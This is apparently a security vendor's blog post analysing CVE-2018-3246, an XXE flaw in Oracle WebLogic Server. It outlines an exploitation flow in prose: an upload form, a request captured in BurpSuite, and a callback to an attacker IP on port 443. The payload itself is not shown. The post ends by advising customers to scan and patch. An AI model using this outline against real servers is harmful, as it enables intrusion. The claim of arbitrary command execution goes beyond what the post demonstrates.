Oracle WebLogic Server XML External Entity Vulnerability (CVE-2018-3246)

Oracle has addressed several WebLogic Server vulnerabilities this Patch Tuesday. In this post we will discuss one of the critical vulnerbilities, CVE-2018-3246. It’s an XML External Entity (XXE) vulnerability that affects Oracle WebLogic Server versions¬†12.1.3.0, and 12.2.1.3.

Vulnerability Analysis:

The vulnerability exists in a component that allows users to upload configuration files in an XML format. The server throws an error when a malformed XML is submitted.

Malformed Request

Let’s create a simple file upload form and submit the request to WebLogic server:

WebLogic-Upload.html

Let’s capture this request in BurpSuite. The server response confirms that it indeed tried to connect to attacking IP over port 443:

and we now have a connection from WebLogic server on our attacking IP:

Conclusion:

An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary commands on the system. Customers are advised to scan their network for QID#87368 and QID#371264 to find vulnerable WebLogic Servers and apply appropriate patches.

Leave a Reply

Your email address will not be published. Required fields are marked *